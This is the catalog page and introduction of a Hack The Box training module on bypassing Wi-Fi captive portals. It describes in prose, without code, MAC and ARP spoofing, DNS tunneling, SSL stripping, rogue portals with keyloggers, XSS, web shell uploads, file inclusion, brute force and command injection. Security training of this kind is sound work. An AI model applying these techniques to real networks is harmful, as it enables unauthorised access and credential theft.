New Job-Role Training Path: Active Directory Penetration Tester! Learn More

Bypassing Wi-Fi Captive Portals

In this module, we delve into a range of methods for identifying and bypassing captive portals, employing both indirect and direct exploitation techniques. We cover tactics such as MAC spoofing, ARP poisoning, DNS tunneling, and credential interception, alongside direct attack vectors like Cross-Site Scripting (XSS), file upload vulnerabilities, file inclusion, and brute force attacks. Additionally, we will examine client hijacking strategies to extract credentials and circumvent portal restrictions. By understanding these attack methods, we can evaluate and enhance the security of captive portal implementations.

4.50

Created by Sentinal
Co-Authors: MrGrep, N1tr0x

Medium Offensive

Summary

In this module, we explore methods for enumerating and attacking Wi-Fi captive portals with the goal of bypassing them. Captive portals are commonly used to restrict network access until authentication is completed, but they often contain vulnerabilities that can be exploited. We will demonstrate a range of techniques, including captive portal detection, indirect and direct exploitation methods, and client-side hijacking strategies. These can be used to compromise devices on the network, extract stored credentials, and ultimately bypass the portal's access restrictions. By understanding and applying these attack vectors, we gain deeper insight into the inherent security flaws in captive portals and how attackers can exploit them.

In this module, we will cover:

  • Introduction
    • Captive Portal Usage
    • Reconnaissance
  • In-Direct Exploitation of captive portal, such as:
    • MAC Address Spoofing
    • VPN Bypasses
    • ARP Spoofing and Hijacking
    • External HTTP Credential Interception
    • External HTTP Session Interception
    • Hostile Portal Attacks
  • Hijacking Clients through:
    • Vulnerable Servicee
    • Interception
    • Malware Portals
  • Direct Exploitation of captive portal, such as:
    • Brute Forcing
    • XSS and Command Injection
    • Host Header Manipulation
    • File Upload Attacks
    • File Inclusion and Privilege Escalation
  • Skills Assessment

This module is broken down into sections with accompanying hands-on exercises to practice each of the tools, tactics, and techniques we cover. There are no specific WiFi hardware requirements for this module, as Hack The Box manages all necessary resources. You will need to RDP into the provided attacker VM to perform the exercises.

As you work through the module, you will see example commands and command outputs for the various tools and topics introduced. Reproducing as many examples as possible is recommended to reinforce the concepts presented in each section.

You can start and stop the module at any time and pick up where you left off. There is no time limit or grading, but you must complete all of the exercises and the skills assessments to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.

This module is classified as "Medium" and assumes a working knowledge of Linux systems, common web vulnerabilities, Wi-Fi fundamentals and network fundamentals. A firm grasp of the following modules can be considered a prerequisite for the successful completion of this module:

Introduction

Captive portals are authentication gateways that control access to a network, commonly used in public Wi-Fi hotspots, corporate environments, and paid Wi-Fi services. These portals ensure that users comply with specific terms before gaining internet access. When a user connects, their browser is redirected to the captive portal, which may require authentication, agreement to terms, or even payment before granting internet access.

Common Use Cases of Captive Portals:

Captive portals serve as a controlled gateway for users accessing a network. They are widely used in different environments to regulate internet access, enforce policies, and enhance security. Below are some of the most common use cases:

  • Public Wi-Fi (Hotels, Airports, Cafes, Shopping Malls) – To control and monitor access.
  • Corporate Networks and Enterprises– To enforce access policies.
  • Paid Wi-Fi Services – To collect payments before granting internet access.

How Captive Portals Work?

The process typically follows these steps:

1. Connection

When a user connects to a Wi-Fi network, whether open or encrypted, their device requests an IP address from the network's DHCP server. This allows the device to communicate with the local network but not necessarily access the internet. Intro

2. Redirection to Captive Portal

Once connected, if the user tries to access any website, their request is intercepted by the network gateway. Instead of reaching the intended site, the network redirects the user to a captive portal page. This is done using DNS hijacking or HTTP interception techniques.

The portal page typically contains a login form, terms of use, or a payment option, depending on the network's requirements.

3. Authentication and User Agreement

At this stage, the user must complete one of the following actions to gain network access:

  • Login with credentials – In enterprise or university networks, users may need to enter a username and password.
  • Accept terms and conditions – In public Wi-Fi setups, simply agreeing to terms may be sufficient.
  • Enter a voucher or access code – Some networks issue temporary access codes to limit usage.
  • Payment for access – Paid Wi-Fi services require users to enter payment details before proceeding.

4. Network Access Granted

Once the user has successfully authenticated, the captive portal grants them internet access. This is usually done by updating the firewall rules or inserting the user's MAC address into an allowlist.

Some networks impose additional restrictions, such as:

  • Session time limits – Users may need to reauthenticate after a set duration.
  • Bandwidth limitations – Speeds may be throttled to prevent excessive usage.
  • Concurrent connection limits – Some networks restrict the number of devices per user.

Attacking Captive Portals:

While captive portals serve as an access control mechanism for networks, they also introduce several security risks. Attackers can exploit these portals to intercept traffic, steal credentials, or bypass restrictions. Below are some key security concerns:

1. Man-in-the-Middle (MitM) Attacks:

Since users must first connect to an untrusted network before authentication, attackers can position themselves between the user and the legitimate portal to intercept traffic. Common MitM techniques include:

  • ARP Spoofing – By poisoning the ARP cache, an attacker can intercept and modify network traffic.
  • SSL Stripping/Interception – If the captive portal forces an HTTPS login page, attackers can downgrade or intercept secure connections and capture credentials in plaintext.

2. Credential Harvesting via Fake Captive Portals:

Attackers can create rogue captive portals that mimic legitimate login pages to steal user credentials. This is especially dangerous in environments where users use the same credentials for enterprise Wi-Fi authentication.

  • Rogue Access Points – Attackers set up a fake Wi-Fi network with the same SSID as the target network and host a fake captive portal to lure users into connecting. Once a user enters their credentials, the attacker captures them and can use them for unauthorized access to corporate or enterprise networks. Attackers can also use JavaScript keyloggers embedded in fake captive portals to log keystrokes in real-time.

3. Bypass Methods and Evasion Techniques:

Some users attempt to bypass captive portals using various techniques, including:

  • DNS Tunneling – Encapsulating internet traffic within DNS queries to evade access restrictions.
  • MAC Address Spoofing – Cloning the MAC address of an already authenticated device to trick the network into granting access.
  • Session Hijacking – Capturing and reusing authentication cookies or session tokens to bypass login pages.

4. Direct Attacks on Captive Portals

Since captive portals often include login pages and web-based authentication mechanisms, they can be vulnerable to traditional web security threats:

  • Cross-Site Scripting (XSS) - If the portal does not properly sanitize user input, an attacker can inject malicious JavaScript into the page which can lead to session hijacking, credential theft, or browser-based exploits.
  • File Upload Vulnerabilities - Some captive portals allow users to upload identification documents or proof of payment. If file type validation or upload directory permissions are not properly enforced, attackers may upload malicious scripts or web shells.
  • Brute Force - If the captive portal relies on weak authentication (e.g., simple passwords or 4-digit PINs), attackers can automate login attempts to guess credentials. Lack of rate-limiting or account lockout mechanisms makes brute-forcing easier.
  • File Inclusion - If the captive portal has a file inclusion vulnerability, attackers can read sensitive files from the server.
  • Host Header Manipulation – Many captive portals rely on the Host header to determine how requests are processed. By modifying this header, we may be able to bypass authentication or gain access to restricted pages. Some portals use weak validation, allowing us to trick the server into thinking we are already authenticated.
  • Command Injection – If the captive portal executes system commands based on user input (such as verifying MAC addresses or processing login credentials), we can attempt command injection. Exploiting vulnerable parameters may allow us to execute arbitrary system commands, escalate privileges, or completely bypass authentication.

Captive portals are essential for securing network access, ensuring compliance, and controlling bandwidth usage. However, they also present opportunities for bypassing techniques, which we will explore in later sections.

Sign Up / Log In to Unlock the Module

Please Sign Up or Log In to unlock the module and access the rest of the sections.

Sections